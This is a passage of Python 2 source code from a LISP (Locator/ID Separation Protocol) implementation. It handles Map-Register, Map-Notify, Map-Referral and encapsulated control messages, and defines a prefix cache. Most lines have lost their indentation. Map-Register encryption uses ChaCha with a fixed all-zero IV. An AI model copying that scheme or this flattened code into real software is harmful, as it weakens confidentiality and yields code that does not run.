lprint((" {}EID-crypto-hash signature verification {} " + \
"for EID-prefix {}, no signature found").format(required,
bold("failed", False), eid_str))
else:
cga_good = lisp_verify_cga_sig(eid_record.eid, rloc)
passfail = bold("passed" if cga_good else "failed", False)
lprint((" {}EID-crypto-hash signature verification {} " + \
"for EID-prefix {}").format(required, passfail, eid_str))
#endif
#endif
if (auth_good == False or cga_good == False):
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
continue
#endif
#
        # If merge is being requested, get the individual site-eid. If not,
        # and what was cached had the merge bit set, set a flag to issue an
        # error.
#
if (map_register.merge_register_requested):
parent = site_eid
parent.inconsistent_registration = False
#
# Clear out all registrations, there is a new site-id registering.
# Or there can be multiple sites registering for a multicast (S,G).
#
if (site_eid.group.is_null()):
if (parent.site_id != map_register.site_id):
parent.site_id = map_register.site_id
parent.registered = False
parent.individual_registrations = {}
parent.registered_rlocs = []
lisp_registered_count -= 1
#endif
#endif
key = source.address + map_register.xtr_id
if (site_eid.individual_registrations.has_key(key)):
site_eid = site_eid.individual_registrations[key]
else:
site_eid = lisp_site_eid(site)
site_eid.eid.copy_address(parent.eid)
site_eid.group.copy_address(parent.group)
parent.individual_registrations[key] = site_eid
#endif
else:
site_eid.inconsistent_registration = \
site_eid.merge_register_requested
#endif
site_eid.map_registers_received += 1
#
        # If TTL is 0, unregister entry if source of Map-Register is in the
# list of currently registered RLOCs.
#
bad = (site_eid.is_rloc_in_rloc_set(source) == False)
if (eid_record.record_ttl == 0 and bad):
lprint(" Ignore deregistration request from {}".format( \
red(source.print_address_no_iid(), False)))
continue
#endif
#
# Clear out previously stored RLOCs. Put new ones in if validated
# against configured ones.
#
previous_rlocs = site_eid.registered_rlocs
site_eid.registered_rlocs = []
#
# Process each RLOC record in EID record.
#
start_rloc_records = packet
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
rloc_record.print_record(" ")
#
# Run RLOC in Map-Register against configured RLOC policies.
#
if (len(site.allowed_rlocs) > 0):
addr_str = rloc_record.rloc.print_address()
if (site.allowed_rlocs.has_key(addr_str) == False):
lprint((" Reject registration, RLOC {} not " + \
"configured in allowed RLOC-set").format( \
red(addr_str, False)))
site_eid.registered = False
packet = rloc_record.end_of_rlocs(packet,
eid_record.rloc_count - j - 1)
break
#endif
#endif
#
# RLOC validated good. Otherwise, go to next EID record
#
rloc = lisp_rloc()
rloc.store_rloc_from_record(rloc_record, None, source)
#
# If the source of the Map-Register is in the locator-set, then
# store if it wants Map-Notify messages when a new locator-set
# is registered later.
#
if (source.is_exact_match(rloc.rloc)):
rloc.map_notify_requested = map_register.map_notify_requested
#endif
#
# Add to RLOC set for site-eid.
#
site_eid.registered_rlocs.append(rloc)
#endfor
changed_rloc_set = \
(site_eid.do_rloc_sets_match(previous_rlocs) == False)
#
# Do not replace RLOCs if the Map-Register is a refresh and the
# locator-set is different.
#
if (map_register.map_register_refresh and changed_rloc_set and
site_eid.registered):
lprint(" Reject registration, refreshes cannot change RLOC-set")
site_eid.registered_rlocs = previous_rlocs
continue
#endif
#
# Copy fields from packet into internal data structure. First set
# site EID specific state.
#
if (site_eid.registered == False):
site_eid.first_registered = lisp_get_timestamp()
lisp_registered_count += 1
#endif
site_eid.last_registered = lisp_get_timestamp()
site_eid.registered = (eid_record.record_ttl != 0)
site_eid.last_registerer = source
#
# Now set site specific state.
#
site_eid.auth_sha1_or_sha2 = sha1_or_sha2
site_eid.proxy_reply_requested = map_register.proxy_reply_requested
site_eid.lisp_sec_present = map_register.lisp_sec_present
site_eid.map_notify_requested = map_register.map_notify_requested
site_eid.mobile_node_requested = map_register.mobile_node
site_eid.merge_register_requested = \
map_register.merge_register_requested
site_eid.use_register_ttl_requested = map_register.use_ttl_for_timeout
if (site_eid.use_register_ttl_requested):
site_eid.register_ttl = eid_record.store_ttl()
else:
site_eid.register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
#endif
site_eid.xtr_id_present = map_register.xtr_id_present
if (site_eid.xtr_id_present):
site_eid.xtr_id = map_register.xtr_id
site_eid.site_id = map_register.site_id
#endif
#
# If merge requested, do it now for this EID-prefix.
#
if (map_register.merge_register_requested):
if (parent.merge_in_site_eid(site_eid)):
rle_list.append([eid_record.eid, eid_record.group])
#endif
if (map_register.map_notify_requested):
lisp_send_merged_map_notify(lisp_sockets, parent, map_register,
eid_record)
#endif
#endif
if (changed_rloc_set == False): continue
if (len(rle_list) != 0): continue
eid_list.append(site_eid.print_eid_tuple())
#
        # Send Map-Notify if the RLOC-set changed for this site-eid. Send it
# to the previously registered RLOCs only if they requested it. Do
# not consider RLOC-sets with RLEs in them because at the end of
# the EID-record loop, we'll send a multicast Map-Notify.
#
eid_record = eid_record.encode()
eid_record += start_rloc_records
el = [site_eid.print_eid_tuple()]
lprint(" Changed RLOC-set, Map-Notifying old RLOC-set")
for rloc in previous_rlocs:
if (rloc.map_notify_requested == False): continue
if (rloc.rloc.is_exact_match(source)): continue
lisp_build_map_notify(lisp_sockets, eid_record, el, 1, rloc.rloc,
LISP_CTRL_PORT, map_register.nonce, map_register.key_id,
map_register.alg_id, map_register.auth_len, site, False)
#endfor
#
# Check subscribers.
#
lisp_notify_subscribers(lisp_sockets, eid_record, site_eid.eid, site)
#endfor
#
    # Send Map-Notify to ITRs if any (S,G) RLE has changed.
#
if (len(rle_list) != 0):
lisp_queue_multicast_map_notify(lisp_sockets, rle_list)
#endif
#
    # The merged Map-Notify will serve as a Map-Register ack, so we don't
    # need to send another one below.
#
if (map_register.merge_register_requested): return
#
# Should we ack the Map-Register? Only if the Want-Map-Notify bit was set
# by the registerer.
#
if (map_register.map_notify_requested and site != None):
lisp_build_map_notify(lisp_sockets, start_eid_records, eid_list,
map_register.record_count, source, sport, map_register.nonce,
map_register.key_id, map_register.alg_id, map_register.auth_len,
site, True)
#endif
return
#enddef
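#
# _example_register_auth_check
#
# Minimal sketch (illustration only, never called) of the per-EID-record
# authentication step in lisp_process_map_register() above. key-id 0 is the
# fallback when the key-id in the Map-Register is not configured for the
# site. Assumes lisp_verify_auth() as used elsewhere in this file.
#
def _example_register_auth_check(orig_packet, map_register, site):
    key_id = map_register.key_id
    if (site.auth_key.has_key(key_id) == False): key_id = 0
    password = site.auth_key[key_id]
    return(lisp_verify_auth(orig_packet, map_register.alg_id,
        map_register.auth_data, password))
#enddef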
#
# lisp_process_multicast_map_notify
#
# Have the ITR process receive a multicast Map-Notify message. We will update
# the map-cache with a new RLE for the (S,G) entry. We do not have to
# authenticate the Map-Notify or send a Map-Notify-Ack since the lisp-etr
# process has already done so.
#
def lisp_process_multicast_map_notify(packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(packet)
if (packet == None):
lprint("Could not decode Map-Notify packet")
return
#endif
map_notify.print_notify()
if (map_notify.record_count == 0): return
eid_records = map_notify.eid_records
for i in range(map_notify.record_count):
eid_record = lisp_eid_record()
eid_records = eid_record.decode(eid_records)
        if (eid_records == None): return
eid_record.print_record(" ", False)
#
# Get or create map-cache entry for (S,G).
#
mc = lisp_map_cache_lookup(eid_record.eid, eid_record.group)
if (mc == None):
allow, nil = lisp_allow_gleaning(eid_record.eid, eid_record.group,
None)
if (allow == False): continue
mc = lisp_mapping(eid_record.eid, eid_record.group, [])
mc.add_cache()
#endif
#
        # Gleaned map-cache entries always override what is registered in
        # the mapping system, since the mapping system RLE entries are RTRs
        # and the RTRs store gleaned mappings for group members.
#
if (mc.gleaned):
lprint("Suppress Map-Notify for gleaned {}".format( \
green(mc.print_eid_tuple(), False)))
continue
#endif
mc.mapping_source = None if source == "lisp-etr" else source
mc.map_cache_ttl = eid_record.store_ttl()
#
# If no RLOCs in the Map-Notify and we had RLOCs in the existing
# map-cache entry, remove them.
#
if (len(mc.rloc_set) != 0 and eid_record.rloc_count == 0):
mc.rloc_set = []
mc.build_best_rloc_set()
lisp_write_ipc_map_cache(True, mc)
lprint("Update {} map-cache entry with no RLOC-set".format( \
green(mc.print_eid_tuple(), False)))
continue
#endif
rtr_mc = mc.rtrs_in_rloc_set()
#
# If there are RTRs in the RLOC set for an existing map-cache entry,
# only put RTR RLOCs from the Map-Notify in the map-cache.
#
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
eid_records = rloc_record.decode(eid_records, None)
rloc_record.print_record(" ")
if (eid_record.group.is_null()): continue
if (rloc_record.rle == None): continue
#
# Get copy of stats from old stored record so the display can
# look continuous even though the physical pointer is changing.
#
stats = mc.rloc_set[0].stats if len(mc.rloc_set) != 0 else None
#
# Store in map-cache.
#
rloc = lisp_rloc()
rloc.store_rloc_from_record(rloc_record, None, mc.mapping_source)
if (stats != None): rloc.stats = copy.deepcopy(stats)
if (rtr_mc and rloc.is_rtr() == False): continue
mc.rloc_set = [rloc]
mc.build_best_rloc_set()
lisp_write_ipc_map_cache(True, mc)
lprint("Update {} map-cache entry with RLE {}".format( \
green(mc.print_eid_tuple(), False), rloc.rle.print_rle(False)))
#endfor
#endfor
return
#enddef
#
# lisp_process_map_notify
#
# Process Map-Notify message. All that needs to be done is to validate it with
# the Map-Server that sent it and return a Map-Notify-Ack.
#
def lisp_process_map_notify(lisp_sockets, orig_packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(orig_packet)
if (packet == None):
lprint("Could not decode Map-Notify packet")
return
#endif
map_notify.print_notify()
#
    # Get map-server so we can do statistics and find the auth-key, if an
    # auth-key was provided in the Map-Notify message.
#
s = source.print_address()
if (map_notify.alg_id != 0 or map_notify.auth_len != 0):
ms = None
for key in lisp_map_servers_list:
if (key.find(s) == -1): continue
ms = lisp_map_servers_list[key]
#endfor
if (ms == None):
lprint((" Could not find Map-Server {} to authenticate " + \
"Map-Notify").format(s))
return
#endif
ms.map_notifies_received += 1
auth_good = lisp_verify_auth(packet, map_notify.alg_id,
map_notify.auth_data, ms.password)
lprint(" Authentication {} for Map-Notify".format("succeeded" if \
auth_good else "failed"))
if (auth_good == False): return
else:
ms = lisp_ms(s, None, "", 0, "", False, False, False, False, 0, 0, 0,
None)
#endif
#
    # Send out Map-Notify-Ack. Skip over the packet header so
    # lisp_send_map_notify_ack() starts the packet with EID-records.
#
eid_records = map_notify.eid_records
if (map_notify.record_count == 0):
lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms)
return
#endif
#
# If this is a Map-Notify for an (S,G) entry, send the message to the
# lisp-itr process so it can update its map-cache for an active source
    # in this site. There is probably an RLE change that the ITR needs to know
# about.
#
eid_record = lisp_eid_record()
packet = eid_record.decode(eid_records)
if (packet == None): return
eid_record.print_record(" ", False)
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Notify packet")
return
#endif
rloc_record.print_record(" ")
#endfor
#
# Right now, don't do anything with non-multicast EID records.
#
if (eid_record.group.is_null() == False):
#
# Forward to lisp-itr process via the lisp-core process so multicast
# Map-Notify messages are processed by the ITR process.
#
lprint("Send {} Map-Notify IPC message to ITR process".format( \
green(eid_record.print_eid_tuple(), False)))
ipc = lisp_control_packet_ipc(orig_packet, s, "lisp-itr", 0)
lisp_ipc(ipc, lisp_sockets[2], "lisp-core-pkt")
#endif
#
# Send Map-Notify-Ack after processing contents of Map-Notify.
#
lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms)
return
#enddef
#
# lisp_process_map_notify_ack
#
# Process received Map-Notify-Ack. This causes the Map-Notify to be removed
# from the lisp_map_notify_queue{}.
#
def lisp_process_map_notify_ack(packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(packet)
if (packet == None):
lprint("Could not decode Map-Notify-Ack packet")
return
#endif
map_notify.print_notify()
#
# Get an EID-prefix out of the Map-Notify-Ack so we can find the site
# associated with it.
#
if (map_notify.record_count < 1):
lprint("No EID-prefix found, cannot authenticate Map-Notify-Ack")
return
#endif
eid_record = lisp_eid_record()
if (eid_record.decode(map_notify.eid_records) == None):
lprint("Could not decode EID-record, cannot authenticate " +
"Map-Notify-Ack")
return
    #endif
eid_record.print_record(" ", False)
eid_str = eid_record.print_eid_tuple()
#
# Find site associated with EID-prefix from first record.
#
if (map_notify.alg_id != LISP_NONE_ALG_ID and map_notify.auth_len != 0):
site_eid = lisp_sites_by_eid.lookup_cache(eid_record.eid, True)
if (site_eid == None):
notfound = bold("Site not found", False)
lprint(("{} for EID {}, cannot authenticate Map-Notify-Ack"). \
format(notfound, green(eid_str, False)))
return
#endif
site = site_eid.site
#
# Count it.
#
site.map_notify_acks_received += 1
key_id = map_notify.key_id
if (site.auth_key.has_key(key_id) == False): key_id = 0
password = site.auth_key[key_id]
auth_good = lisp_verify_auth(packet, map_notify.alg_id,
map_notify.auth_data, password)
key_id = "key-id {}".format(key_id) if key_id == map_notify.key_id \
else "bad key-id {}".format(map_notify.key_id)
lprint(" Authentication {} for Map-Notify-Ack, {}".format( \
"succeeded" if auth_good else "failed", key_id))
if (auth_good == False): return
#endif
#
# Remove Map-Notify from retransmission queue.
#
if (map_notify.retransmit_timer): map_notify.retransmit_timer.cancel()
etr = source.print_address()
key = map_notify.nonce_key
if (lisp_map_notify_queue.has_key(key)):
map_notify = lisp_map_notify_queue.pop(key)
if (map_notify.retransmit_timer): map_notify.retransmit_timer.cancel()
lprint("Dequeue Map-Notify from retransmit queue, key is: {}". \
format(key))
else:
lprint("Map-Notify with nonce 0x{} queue entry not found for {}". \
format(map_notify.nonce_key, red(etr, False)))
#endif
return
#enddef
#
# lisp_map_referral_loop
#
# Check to see if the arrived Map-Referral EID-prefix is more-specific than
# the last one we received.
#
def lisp_map_referral_loop(mr, eid, group, action, s):
if (action not in (LISP_DDT_ACTION_NODE_REFERRAL,
LISP_DDT_ACTION_MS_REFERRAL)): return(False)
if (mr.last_cached_prefix[0] == None): return(False)
#
# Check group first, if any. Then EID-prefix as source if (S,G).
#
loop = False
if (group.is_null() == False):
loop = mr.last_cached_prefix[1].is_more_specific(group)
#endif
if (loop == False):
loop = mr.last_cached_prefix[0].is_more_specific(eid)
#endif
if (loop):
prefix_str = lisp_print_eid_tuple(eid, group)
cached_str = lisp_print_eid_tuple(mr.last_cached_prefix[0],
mr.last_cached_prefix[1])
lprint(("Map-Referral prefix {} from {} is not more-specific " + \
"than cached prefix {}").format(green(prefix_str, False), s,
cached_str))
#endif
return(loop)
#enddef
#
# lisp_process_map_referral
#
# This function processes a Map-Referral message by a Map-Resolver.
#
def lisp_process_map_referral(lisp_sockets, packet, source):
map_referral = lisp_map_referral()
packet = map_referral.decode(packet)
if (packet == None):
lprint("Could not decode Map-Referral packet")
return
#endif
map_referral.print_map_referral()
s = source.print_address()
nonce = map_referral.nonce
#
    # Process each EID record in Map-Referral message.
#
for i in range(map_referral.record_count):
eid_record = lisp_eid_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Referral packet")
return
#endif
eid_record.print_record(" ", True)
#
# Check if we have an outstanding request for this Map-Referral reply.
#
key = str(nonce)
if (key not in lisp_ddt_map_requestQ):
lprint(("Map-Referral nonce 0x{} from {} not found in " + \
"Map-Request queue, EID-record ignored").format( \
lisp_hex_string(nonce), s))
continue
#endif
mr = lisp_ddt_map_requestQ[key]
if (mr == None):
lprint(("No Map-Request queue entry found for Map-Referral " +
"nonce 0x{} from {}, EID-record ignored").format( \
lisp_hex_string(nonce), s))
continue
#endif
#
        # Check for Map-Referral looping. If there is no loop, cache the EID
        # returned from the Map-Referral in the Map-Request queue entry.
#
if (lisp_map_referral_loop(mr, eid_record.eid, eid_record.group,
eid_record.action, s)):
mr.dequeue_map_request()
continue
#endif
mr.last_cached_prefix[0] = eid_record.eid
mr.last_cached_prefix[1] = eid_record.group
#
# Lookup referral in referral-cache.
#
add_or_replace = False
referral = lisp_referral_cache_lookup(eid_record.eid, eid_record.group,
True)
if (referral == None):
add_or_replace = True
referral = lisp_referral()
referral.eid = eid_record.eid
referral.group = eid_record.group
if (eid_record.ddt_incomplete == False): referral.add_cache()
elif (referral.referral_source.not_set()):
lprint("Do not replace static referral entry {}".format( \
green(referral.print_eid_tuple(), False)))
mr.dequeue_map_request()
continue
#endif
action = eid_record.action
referral.referral_source = source
referral.referral_type = action
ttl = eid_record.store_ttl()
referral.referral_ttl = ttl
referral.expires = lisp_set_timestamp(ttl)
#
# Mark locator up if the Map-Referral source is in the referral-set.
#
negative = referral.is_referral_negative()
if (referral.referral_set.has_key(s)):
ref_node = referral.referral_set[s]
if (ref_node.updown == False and negative == False):
ref_node.updown = True
lprint("Change up/down status for referral-node {} to up". \
format(s))
elif (ref_node.updown == True and negative == True):
ref_node.updown = False
lprint(("Change up/down status for referral-node {} " + \
"to down, received negative referral").format(s))
#endif
#endif
#
        # Set dirty-bit so we can remove referral-nodes from the cached entry
        # that weren't in the packet.
#
dirty_set = {}
for key in referral.referral_set: dirty_set[key] = None
#
# Process each referral RLOC-record in EID record.
#
for i in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
if (packet == None):
lprint("Could not decode RLOC-record in Map-Referral packet")
return
#endif
rloc_record.print_record(" ")
#
# Copy over existing referral-node
#
addr_str = rloc_record.rloc.print_address()
if (referral.referral_set.has_key(addr_str) == False):
ref_node = lisp_referral_node()
ref_node.referral_address.copy_address(rloc_record.rloc)
referral.referral_set[addr_str] = ref_node
if (s == addr_str and negative): ref_node.updown = False
else:
ref_node = referral.referral_set[addr_str]
if (dirty_set.has_key(addr_str)): dirty_set.pop(addr_str)
#endif
ref_node.priority = rloc_record.priority
ref_node.weight = rloc_record.weight
#endfor
#
# Now remove dirty referral-node entries.
#
for key in dirty_set: referral.referral_set.pop(key)
eid_str = referral.print_eid_tuple()
if (add_or_replace):
if (eid_record.ddt_incomplete):
lprint("Suppress add {} to referral-cache".format( \
green(eid_str, False)))
else:
lprint("Add {}, referral-count {} to referral-cache".format( \
green(eid_str, False), eid_record.rloc_count))
#endif
else:
lprint("Replace {}, referral-count: {} in referral-cache".format( \
green(eid_str, False), eid_record.rloc_count))
#endif
#
# Process actions.
#
if (action == LISP_DDT_ACTION_DELEGATION_HOLE):
lisp_send_negative_map_reply(mr.lisp_sockets, referral.eid,
referral.group, mr.nonce, mr.itr, mr.sport, 15, None, False)
mr.dequeue_map_request()
#endif
if (action == LISP_DDT_ACTION_NOT_AUTH):
if (mr.tried_root):
lisp_send_negative_map_reply(mr.lisp_sockets, referral.eid,
referral.group, mr.nonce, mr.itr, mr.sport, 0, None, False)
mr.dequeue_map_request()
else:
lisp_send_ddt_map_request(mr, True)
#endif
#endif
if (action == LISP_DDT_ACTION_MS_NOT_REG):
if (referral.referral_set.has_key(s)):
ref_node = referral.referral_set[s]
ref_node.updown = False
#endif
if (len(referral.referral_set) == 0):
mr.dequeue_map_request()
else:
lisp_send_ddt_map_request(mr, False)
#endif
#endif
if (action in (LISP_DDT_ACTION_NODE_REFERRAL,
LISP_DDT_ACTION_MS_REFERRAL)):
if (mr.eid.is_exact_match(eid_record.eid)):
if (not mr.tried_root):
lisp_send_ddt_map_request(mr, True)
else:
lisp_send_negative_map_reply(mr.lisp_sockets,
referral.eid, referral.group, mr.nonce, mr.itr,
mr.sport, 15, None, False)
mr.dequeue_map_request()
#endif
else:
lisp_send_ddt_map_request(mr, False)
#endif
#endif
if (action == LISP_DDT_ACTION_MS_ACK): mr.dequeue_map_request()
#endfor
return
#enddef
#
# lisp_process_ecm
#
# Process a received Encapsulated-Control-Message. It is assumed for right now
# that all ECMs have a Map-Request embedded.
#
def lisp_process_ecm(lisp_sockets, packet, source, ecm_port):
ecm = lisp_ecm(0)
packet = ecm.decode(packet)
if (packet == None):
lprint("Could not decode ECM packet")
return
#endif
ecm.print_ecm()
header = lisp_control_header()
if (header.decode(packet) == None):
lprint("Could not decode control header")
return
#endif
packet_type = header.type
del(header)
if (packet_type != LISP_MAP_REQUEST):
lprint("Received ECM without Map-Request inside")
return
#endif
#
# Process Map-Request.
#
mr_port = ecm.udp_sport
lisp_process_map_request(lisp_sockets, packet, source, ecm_port,
ecm.source, mr_port, ecm.ddt, -1)
return
#enddef
#------------------------------------------------------------------------------
#
# lisp_send_map_register
#
# Compute authentication for a Map-Register message and send it to the
# supplied Map-Server.
#
def lisp_send_map_register(lisp_sockets, packet, map_register, ms):
#
# If we are doing LISP-Decent and have a multicast group configured as
# a Map-Server, we can't join the group by using the group so we have to
# send to the loopback address to bootstrap our membership. We join to
# one other member of the peer-group so we can get the group membership.
#
dest = ms.map_server
if (lisp_decent_push_configured and dest.is_multicast_address() and
(ms.map_registers_multicast_sent == 1 or ms.map_registers_sent == 1)):
dest = copy.deepcopy(dest)
dest.address = 0x7f000001
b = bold("Bootstrap", False)
g = ms.map_server.print_address_no_iid()
lprint("{} mapping system for peer-group {}".format(b, g))
#endif
#
# Modify authentication hash in Map-Register message if supplied when
# lisp_map_register() was called.
#
packet = lisp_compute_auth(packet, map_register, ms.password)
#
# Should we encrypt the Map-Register? Use 16-byte key which is
# 32 string characters.
#
if (ms.ekey != None):
ekey = ms.ekey.zfill(32)
iv = "0" * 8
ciphertext = chacha.ChaCha(ekey, iv).encrypt(packet[4::])
packet = packet[0:4] + ciphertext
e = bold("Encrypt", False)
lprint("{} Map-Register with key-id {}".format(e, ms.ekey_id))
#endif
decent = ""
if (lisp_decent_pull_xtr_configured()):
decent = ", decent-index {}".format(bold(ms.dns_name, False))
#endif
lprint("Send Map-Register to map-server {}{}{}".format( \
dest.print_address(), ", ms-name '{}'".format(ms.ms_name), decent))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
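#
# _example_map_register_encrypt_roundtrip
#
# Illustrative sketch only, never called: shows that the first 4 bytes of a
# Map-Register stay in the clear while the remainder is ChaCha20 encrypted,
# mirroring lisp_send_map_register() above and lisp_decrypt_map_register().
# Assumes the bundled chacha module, whose ChaCha(key, iv) keystream makes
# encrypt() and decrypt() symmetric for the same key and IV.
#
def _example_map_register_encrypt_roundtrip(packet, ekey):
    ekey = ekey.zfill(32)
    iv = "0" * 8
    ciphertext = packet[0:4] + chacha.ChaCha(ekey, iv).encrypt(packet[4::])
    plaintext = packet[0:4] + chacha.ChaCha(ekey, iv).decrypt(ciphertext[4::])
    return(plaintext == packet)
#enddef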
#
# lisp_send_ipc_to_core
#
# Send a LISP control packet that is to be sourced from UDP port 4342 to the
# lisp-core process.
#
def lisp_send_ipc_to_core(lisp_socket, packet, dest, port):
source = lisp_socket.getsockname()
dest = dest.print_address_no_iid()
lprint("Send IPC {} bytes to {} {}, control-packet: {}".format( \
len(packet), dest, port, lisp_format_packet(packet)))
packet = lisp_control_packet_ipc(packet, source, dest, port)
lisp_ipc(packet, lisp_socket, "lisp-core-pkt")
return
#enddef
#
# lisp_send_map_reply
#
# Send Map-Reply message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_reply(lisp_sockets, packet, dest, port):
lprint("Send Map-Reply to {}".format(dest.print_address_no_iid()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_map_referral
#
# Send Map-Referral message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_referral(lisp_sockets, packet, dest, port):
lprint("Send Map-Referral to {}".format(dest.print_address()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_map_notify
#
# Send Map-Notify message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_notify(lisp_sockets, packet, dest, port):
lprint("Send Map-Notify to xTR {}".format(dest.print_address()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_ecm
#
# Send Encapsulated Control Message.
#
def lisp_send_ecm(lisp_sockets, packet, inner_source, inner_sport, inner_dest,
outer_dest, to_etr=False, to_ms=False, ddt=False):
if (inner_source == None or inner_source.is_null()):
inner_source = inner_dest
#endif
#
    # For sending Map-Requests, if NAT-traversal is configured, use the same
    # socket used to send the Info-Request.
#
if (lisp_nat_traversal):
sport = lisp_get_any_translated_port()
if (sport != None): inner_sport = sport
#endif
ecm = lisp_ecm(inner_sport)
ecm.to_etr = to_etr if lisp_is_running("lisp-etr") else False
ecm.to_ms = to_ms if lisp_is_running("lisp-ms") else False
ecm.ddt = ddt
ecm_packet = ecm.encode(packet, inner_source, inner_dest)
if (ecm_packet == None):
lprint("Could not encode ECM message")
return
#endif
ecm.print_ecm()
packet = ecm_packet + packet
addr_str = outer_dest.print_address_no_iid()
lprint("Send Encapsulated-Control-Message to {}".format(addr_str))
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#------------------------------------------------------------------------------
#
# Below are constant definitions used for internal data structures.
#
LISP_AFI_GEO_COORD = -3
LISP_AFI_IID_RANGE = -2
LISP_AFI_ULTIMATE_ROOT = -1
LISP_AFI_NONE = 0
LISP_AFI_IPV4 = 1
LISP_AFI_IPV6 = 2
LISP_AFI_MAC = 6
LISP_AFI_E164 = 8
LISP_AFI_NAME = 17
LISP_AFI_LCAF = 16387
LISP_RLOC_UNKNOWN_STATE = 0
LISP_RLOC_UP_STATE = 1
LISP_RLOC_DOWN_STATE = 2
LISP_RLOC_UNREACH_STATE = 3
LISP_RLOC_NO_ECHOED_NONCE_STATE = 4
LISP_RLOC_ADMIN_DOWN_STATE = 5
LISP_AUTH_NONE = 0
LISP_AUTH_MD5 = 1
LISP_AUTH_SHA1 = 2
LISP_AUTH_SHA2 = 3
#------------------------------------------------------------------------------
#
# This is a general address format for EIDs, RLOCs, EID-prefixes in any AFI or
# LCAF format.
#
LISP_IPV4_HOST_MASK_LEN = 32
LISP_IPV6_HOST_MASK_LEN = 128
LISP_MAC_HOST_MASK_LEN = 48
LISP_E164_HOST_MASK_LEN = 60
#
# byte_swap_64
#
# Byte-swap a 64-bit number.
#
def byte_swap_64(address):
addr = \
((address & 0x00000000000000ff) << 56) | \
((address & 0x000000000000ff00) << 40) | \
((address & 0x0000000000ff0000) << 24) | \
((address & 0x00000000ff000000) << 8) | \
((address & 0x000000ff00000000) >> 8) | \
((address & 0x0000ff0000000000) >> 24) | \
((address & 0x00ff000000000000) >> 40) | \
((address & 0xff00000000000000) >> 56)
return(addr)
#enddef
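#
# Worked example (illustration only):
#
#   byte_swap_64(0x0102030405060708) == 0x0807060504030201
#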
#
# lisp_cache is a data structure to implement a multi-way tree. The first
# level array is an associative array of mask-lengths. Then each mask-length
# entry will be an associative array of the following key:
#
# <32-bit-instance-id> <16-bit-address-family> <eid-prefix>
#
# Data structure:
# self.cache{}
# self.cache_sorted[]
# self.cache{}.entries{}
# self.cache{}.entries_sorted[]
#
class lisp_cache_entries():
def __init__(self):
self.entries = {}
self.entries_sorted = []
#enddef
#endclass
class lisp_cache():
def __init__(self):
self.cache = {}
self.cache_sorted = []
self.cache_count = 0
#enddef
def cache_size(self):
return(self.cache_count)
#enddef
def build_key(self, prefix):
if (prefix.afi == LISP_AFI_ULTIMATE_ROOT):
ml = 0
elif (prefix.afi == LISP_AFI_IID_RANGE):
ml = prefix.mask_len
else:
ml = prefix.mask_len + 48
#endif
iid = lisp_hex_string(prefix.instance_id).zfill(8)
afi = lisp_hex_string(prefix.afi).zfill(4)
if (prefix.afi > 0):
if (prefix.is_binary()):
length = prefix.addr_length() * 2
addr = lisp_hex_string(prefix.address).zfill(length)
else:
addr = prefix.address
#endif
elif (prefix.afi == LISP_AFI_GEO_COORD):
afi = "8003"
addr = prefix.address.print_geo()
else:
afi = ""
addr = ""
#endif
key = iid + afi + addr
return([ml, key])
#enddef
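    #
    # Worked example for build_key() above (illustration only): for the
    # EID-prefix [1000]10.0.0.0/8, ml is 8 + 48 = 56 and key is the string
    # "000003e8" (instance-id) + "0001" (AFI) + "0a000000" (address), i.e.
    # "000003e800010a000000".
    #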
def add_cache(self, prefix, entry):
if (prefix.is_binary()): prefix.zero_host_bits()
ml, key = self.build_key(prefix)
if (self.cache.has_key(ml) == False):
self.cache[ml] = lisp_cache_entries()
self.cache[ml].entries = {}
self.cache[ml].entries_sorted = []
self.cache_sorted = sorted(self.cache)
#endif
if (self.cache[ml].entries.has_key(key) == False):
self.cache_count += 1
#endif
self.cache[ml].entries[key] = entry
self.cache[ml].entries_sorted = sorted(self.cache[ml].entries)
#enddef
def lookup_cache(self, prefix, exact):
ml_key, key = self.build_key(prefix)
if (exact):
if (self.cache.has_key(ml_key) == False): return(None)
if (self.cache[ml_key].entries.has_key(key) == False): return(None)
return(self.cache[ml_key].entries[key])
#endif
found = None
for ml in self.cache_sorted:
if (ml_key < ml): return(found)
for entry_key in self.cache[ml].entries_sorted:
entries = self.cache[ml].entries
if (entry_key in entries):
entry = entries[entry_key]
if (entry == None): continue
if (prefix.is_more_specific(entry.eid)): found = entry
#endif
#endfor
#endfor
return(found)
#enddef
def delete_cache(self, prefix):
ml, key = self.build_key(prefix)
if (self.cache.has_key(ml) == False): return
if (self.cache[ml].entries.has_key(key) == False): return
self.cache[ml].entries.pop(key)
self.cache[ml].entries_sorted.remove(key)
self.cache_count -= 1
#enddef
def walk_cache(self, function, parms):
for ml in self.cache_sorted:
for key in self.cache[ml].entries_sorted:
entry = self.cache[ml].entries[key]
status, parms = function(entry, parms)
if (status == False): return(parms)
#endfor
#endfor
return(parms)
#enddef
def print_cache(self):
lprint("Printing contents of {}: ".format(self))
if (self.cache_size() == 0):
lprint(" Cache is empty")
return
#endif
for ml in self.cache_sorted:
